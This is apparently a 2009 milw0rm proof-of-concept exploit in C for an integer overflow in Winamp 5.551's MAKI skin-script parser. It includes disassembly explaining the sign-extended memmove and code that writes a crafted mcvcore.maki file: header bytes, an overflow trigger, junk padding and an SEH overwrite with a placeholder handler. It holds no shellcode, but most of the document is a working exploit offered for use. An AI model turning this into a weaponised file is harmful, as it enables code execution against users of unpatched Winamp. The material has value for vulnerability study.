187 lines
No EOL
7.5 KiB
C
187 lines
No EOL
7.5 KiB
C
/*
|
|
Winamp 5.551 MAKI Parsing Integer Overflow Vulnerability
|
|
|
|
This is just a simple poc code to show how to
|
|
exploit the recent MAKI file parsing vulnerability.
|
|
|
|
Tested on :Vista sp1 and Xpsp3
|
|
Release Date :May 22 2009
|
|
Venders web site :http://www.winamp.com/
|
|
Version Teasted:Winamp 5.551
|
|
Not vulnerable :Winamp 5.552
|
|
|
|
Im not going into any real detail as this is just
|
|
a poc code and i think the guy who wrote the article
|
|
explains where and why the integer overflow happens.
|
|
Im sure if you are that interested have a look through
|
|
the dll your self and you will also see the vulnerable memove :).
|
|
|
|
Credits to the guys down at vrt-sourcefire for the overflow.
|
|
http://vrt-sourcefire.blogspot.com
|
|
|
|
We are able to overwrite the exception handlers and gain full
|
|
control of the application the vendors released a patch for this
|
|
but older versions are still vulnerable.!!!!
|
|
|
|
Below is and explanation of the overflow which i took
|
|
from the web site from the url above.
|
|
|
|
|
|
[--Snip--]
|
|
.text:12094DAB var_10144= byte ptr -10144h
|
|
.text:12094DAB MultiByteStr= byte ptr -13ch
|
|
|
|
If a string size is greater than or equal to 0x8000, edi will be 0xFFFFhhhh
|
|
(where, 0xhhhh is the two byte input)
|
|
|
|
.text:12094F62 loc_12094F62:
|
|
.text:12094F62 mov ax, [ebx]
|
|
.text:12094F65 movsx edi, ax ; sign extension
|
|
.text:12094F68 inc ebx
|
|
.text:12094F69 push edi ; Size
|
|
.text:12094F6A inc ebx
|
|
.text:12094F6B lea eax, [ebp+MultiByteStr]
|
|
.text:12094F71 push ebx ; Src
|
|
.text:12094F72 push eax ; Dst, buffer is located in the stack
|
|
.text:12094F73 call memmove
|
|
|
|
.text:120951E5 loc_120951E5:
|
|
.text:120951E5 mov edi, [ebx]
|
|
.text:120951E7 add ebx, 4
|
|
.text:120951EA mov ax, [ebx]
|
|
.text:120951ED movsx esi, ax ; sign extension
|
|
.text:120951F0 inc ebx
|
|
.text:120951F1 push esi ; Size
|
|
.text:120951F2 inc ebx
|
|
.text:120951F3 lea eax, [ebp+var_10144]
|
|
.text:120951F9 push ebx ; Src
|
|
.text:120951FA push eax ; Dst, buffer is located in the stack
|
|
.text:120951FB call memmove
|
|
[--Snip--]
|
|
|
|
And once the file is created then we need to place the
|
|
mcvcore.maki file inside ..//Winamp/Skins/Bento/Scripts/.
|
|
And then open winamp with olldbg.And step through the
|
|
execution.
|
|
|
|
Credits to n00b for writing simple poc code !!
|
|
Progression is always a good thing.
|
|
----------
|
|
Disclaimer
|
|
----------
|
|
The information in this advisory and any of its
|
|
demonstrations is provided "as is" without any
|
|
warranty of any kind.
|
|
|
|
I am not liable for any direct or indirect damages
|
|
caused as a result of using the information or
|
|
demonstrations provided in any part of this advisory.
|
|
Educational use only..!!
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
#define MAKI "mcvcore.maki"
|
|
|
|
|
|
unsigned char First_Header[] =
|
|
{
|
|
0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
|
|
0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
|
|
0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
|
|
0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
|
|
0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
|
|
0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
|
|
0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
|
|
0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
|
|
0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
|
|
0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
|
|
0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
|
|
0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
|
|
0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
|
|
0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
|
|
0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
|
|
0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
|
|
0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
|
|
0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
|
|
0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
|
|
0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
|
|
0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
|
|
0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
|
|
0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
|
|
0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
|
|
0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
|
|
0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
|
|
0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
|
|
0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
|
|
0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
|
|
0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
|
|
0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
|
|
0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
|
|
0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
|
|
0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
|
|
0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
|
|
0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
|
|
0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
|
|
0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
|
|
0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
|
|
0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
|
|
0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
|
|
0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
|
|
0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
|
|
0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
|
|
0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
|
|
0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
|
|
0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
|
|
0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
|
|
0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
|
|
0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
|
|
0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
|
|
0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
|
|
0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
|
|
0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
|
|
0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
|
|
0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
|
|
0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
|
|
0x6C, 0x73, 0x37, 0x00
|
|
};
|
|
|
|
/*Trigger the overflow*/
|
|
unsigned char Exception [] =
|
|
{
|
|
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
|
|
0xFF, 0xFF, 0xFF
|
|
};
|
|
|
|
|
|
|
|
|
|
unsigned char Junk1 ='A';
|
|
int main()
|
|
{
|
|
FILE *fp;
|
|
int i;
|
|
|
|
if ((fp = fopen(MAKI, "wb")) == NULL)
|
|
{
|
|
printf("File %s write error\n", MAKI);
|
|
return(0);
|
|
}
|
|
|
|
for (i=0; i<sizeof(First_Header); i++)
|
|
fputc(First_Header[i], fp);
|
|
|
|
for (i=0; i<sizeof(Exception); i++)
|
|
fputc(Exception[i], fp);
|
|
|
|
for (i=0;i<16751;i++)
|
|
{
|
|
fwrite(&Junk1,1,1,fp);
|
|
}
|
|
fputs("\xEB\x06\x90\x90", fp);/*Pointer to next seh record */
|
|
fputs("\x42\x42\x42\x42", fp);/*SE handler*/
|
|
fclose(fp);
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2009-05-22]
|